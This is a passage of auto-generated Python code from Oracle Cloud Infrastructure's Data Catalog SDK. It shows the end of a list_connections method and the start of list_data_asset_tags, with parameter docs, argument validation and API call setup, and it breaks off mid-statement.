A filter to return only resources that match the entire display name given. The match is not case sensitive.
:param str lifecycle_state: (optional)
A filter to return only resources that match the specified lifecycle state. The value is case insensitive.
:param datetime time_created: (optional)
Time that the resource was created. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param datetime time_updated: (optional)
Time that the resource was updated. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param str created_by_id: (optional)
OCID of the user who created the resource.
:param str updated_by_id: (optional)
OCID of the user who updated the resource.
:param str external_key: (optional)
Unique external identifier of this resource in the external source system.
:param datetime time_status_updated: (optional)
Time that the resource's status was last updated. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param bool is_default: (optional)
Indicates whether this connection is the default connection.
:param list[str] fields: (optional)
Specifies the fields to return in a connection summary response.
Allowed values are: "key", "displayName", "description", "dataAssetKey", "typeKey", "timeCreated", "externalKey", "lifecycleState", "isDefault", "uri"
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default.
Allowed values are: "TIMECREATED", "DISPLAYNAME"
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_catalog.models.ConnectionCollection`
:rtype: :class:`~oci.response.Response`
"""
resource_path = "/catalogs/{catalogId}/dataAssets/{dataAssetKey}/connections"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"display_name",
"lifecycle_state",
"time_created",
"time_updated",
"created_by_id",
"updated_by_id",
"external_key",
"time_status_updated",
"is_default",
"fields",
"sort_by",
"sort_order",
"limit",
"page",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_connections got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"catalogId": catalog_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'fields' in kwargs:
fields_allowed_values = ["key", "displayName", "description", "dataAssetKey", "typeKey", "timeCreated", "externalKey", "lifecycleState", "isDefault", "uri"]
for fields_item in kwargs['fields']:
if fields_item not in fields_allowed_values:
raise ValueError(
"Invalid value for `fields`, must be one of {0}".format(fields_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED", "DISPLAYNAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"displayName": kwargs.get("display_name", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"timeCreated": kwargs.get("time_created", missing),
"timeUpdated": kwargs.get("time_updated", missing),
"createdById": kwargs.get("created_by_id", missing),
"updatedById": kwargs.get("updated_by_id", missing),
"externalKey": kwargs.get("external_key", missing),
"timeStatusUpdated": kwargs.get("time_status_updated", missing),
"isDefault": kwargs.get("is_default", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionCollection")
def list_data_asset_tags(self, catalog_id, data_asset_key, **kwargs):
"""
Returns a list of all tags for a data asset.
:param str catalog_id: (required)
Unique catalog identifier.
:param str data_asset_key: (required)
Unique data asset key.
:param str name: (optional)
Immutable resource name.
:param str lifecycle_state: (optional)
A filter to return only resources that match the specified lifecycle state. The value is case insensitive.
:param str term_key: (optional)
Unique key of the related term.
:param str term_path: (optional)
Path of the related term.
:param datetime time_created: (optional)
Time that the resource was created. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param str created_by_id: (optional)
OCID of the user who created the resource.
:param list[str] fields: (optional)
Specifies the fields to return in a data asset tag summary response.
Allowed values are: "key", "name", "termKey", "termPath", "termDescription", "lifecycleState", "timeCreated", "uri", "glossaryKey", "dataAssetKey"
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default.
Allowed values are: "TIMECREATED", "DISPLAYNAME"
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_catalog.models.DataAssetTagCollection`
:rtype: :class:`~oci.response.Response`
"""
resource_path = "/catalogs/{catalogId}/dataAssets/{dataAssetKey}/tags"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.